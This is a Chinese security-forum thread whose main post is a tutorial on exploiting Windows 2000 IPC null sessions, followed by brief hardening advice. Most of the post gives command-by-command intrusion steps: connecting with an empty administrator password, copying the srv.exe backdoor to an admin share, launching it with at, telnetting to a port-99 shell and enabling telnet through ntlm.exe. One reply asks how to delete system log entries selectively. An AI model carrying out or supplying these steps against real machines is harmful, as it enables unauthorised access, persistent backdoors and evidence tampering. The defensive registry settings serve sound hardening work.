|
作者: yimarong [yimarong] 版主 | 登录 |
��常常在网上听人说IPC漏洞,那么IPC漏洞到底是什么呢?网络流氓们是怎么利用这个漏洞的呢?抱着这样的问题,我们一起来看看笔者带来的精彩文章! ���� ����什么是IPC漏洞 ���� ����IPC是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。利用IPC我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们还可以得到目标主机上的用户列表。但是,一些别有用心者会利用IPC,查找我们的用户列表,并使用一些字典工具,对我们的主机进行攻击。 ���� ����如何利用IPC漏洞 ���� ����攻击者在这里一般会用到《流光》这个软件,兔子在这里特别提醒你,《流光》是一款功能非常强大的软件,在我们使用时一定要注意,不得进行非法破坏! ���� ����第一步:运行《流光》(现在的最新版本是4.6),按“CTRL+R”键弹出扫描框,我们这里只是做个测试,目的是告诉大家这个漏洞的危害,所以我们现在随便选择一段IP进行扫描。我们扫描的是127.0.0.1(如图),其它的均使用默认,不需要改变设置。 ���� ����第二步:大家打开Win2000自带的命令提示行,注:这里我们不是教大家怎么破坏,只是给大家介绍这个漏洞的危害,所以下面的IP是假设的,并不存在。 ���� ����1. C:\>net use \\127.0.0.1\IPC "" /user:"admintitrators" ���� ����这就是刚才用《流光》扫到的用户名是administrators,密码为“空”的IP地址,如果是攻击者的话,他就会用这样的命令来与127.0.0.1建立一个连接,因为密码为“空”,所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。 ���� ����2. C:\>copy srv.exe \\127.0.0.1\admin ���� ����先复制srv.exe上去,在流光的Tools目录下就有(这里的是指admin用户的c:\winnt\system32\,大家还可以使用c、d,意思是C盘与D盘,这看你要复制到什么地方去了)。 ���� ����3. C:\>net time \\127.0.0.1 ���� ����查查时间,发现127.0.0.1的当前时间是2002/3/19上午11:00,命令成功完成。 ���� ����4. C:\>at \\127.0.0.1 11:05 srv.exe ���� ����用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!) ���� ����5. C:\>net time \\127.0.0.1 ���� ����再查查到时间没有?如果127.0.0.1的当前时间是2002/3/19上午11:05,那就准备开始下面的命令。 ���� ����6. C:\>telnet 127.0.0.1 99 ���� ����这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 ����虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了。 ���� ����7.C:\>copy ntlm.exe \\127.0.0.1\admin ���� ����用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 ���� ����8. C:\WINNT\system32>ntlm ���� ����输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现“DONE”的时候,就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务! ���� ����第三步:我们使用Telnet到对方计算机上去,Telnet 127.0.0.1,接着输入用户名与密码就进入了,操作就像在DOS上操作一样简单! ���� ����如何防范IPC漏洞 ���� ����看了上面的方法是不是觉得该检测一下自己是否有这个漏洞,如果有,还不赶快把这个漏洞给补上?跟我来吧,下面我们将教你如何防范IPC漏洞的入侵 ���� ����1.禁止建立空连接 ���� ����我们首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001。 ���� ����2.禁止管理共享 ���� ����同样也是找到如下组键[HKEY_LOCAL _MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer = DWORD的键值改为:00000000。 ���� ����3.到http://www.heibai.net/download/show.php?id=2194&down=1下载delshare.zip。该工具能自动永久删除Windows 2000所有默认共享的两个批处理文件。 ���� ����4.如果还觉得麻烦的话,也可以把“net share ipc /delete”放进你的启动栏里。 ���� ����5.当然,最简单的方法就是把的密码设置得复杂一些,以免被一些不怀好意的人使用工具破解出来。不过想提醒大家一点,任何复杂的密码都有可能被破解 |
地主 发表时间: 07/28 03:48 |
回复: marsky [marsky] 论坛用户 | 登录 |
好文章!像偶这种什么都不晓得的人一看就明白了,谢谢! |
B1层 发表时间: 07/28 10:34 |
回复: xxzjmcdyt [xxzjmcdyt] 论坛用户 | 登录 |
是啊是啊 高手高手 能否告诉偶您的qq呢? |
B2层 发表时间: 07/29 13:23 |
回复: yimarong [yimarong] 版主 | 登录 |
基础教育! |
B3层 发表时间: 08/01 14:42 |
回复: ma2751_cn [ma2751_cn] | 登录 |
IPC命名管道不是漏洞`~` 而是自己疏忽种下的后门` |
B4层 发表时间: 08/01 19:04 |
回复: qwhjl [qwhjl] 论坛用户 | 登录 |
这种文章到处都是啊~~ |
B5层 发表时间: 08/01 19:45 |
回复: yimarong [yimarong] 版主 | 登录 |
到处都是代表什么呢? 是代表你什么都会呢还是说这东西没用?? 你不需要有人需要嘛! |
B6层 发表时间: 08/06 09:05 |
回复: all528 [all528] 论坛用户 | 登录 |
不错 |
B7层 发表时间: 08/06 09:32 |
回复: yimarong [yimarong] 版主 | 登录 |
呵呵~谢谢捧场! |
B8层 发表时间: 08/06 09:36 |
回复: all528 [all528] 论坛用户 | 登录 |
呵呵 文章好就值得捧场 |
B9层 发表时间: 08/06 09:47 |
回复: cqnp7 [cqnp7] 论坛用户 | 登录 |
请问windows 2000 系统日志怎样能逐条删除? |
B10层 发表时间: 08/06 10:05 |
回复: tianyecool [tianyecool] 论坛用户 | 登录 |
顶 |
B11层 发表时间: 08/06 14:08 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号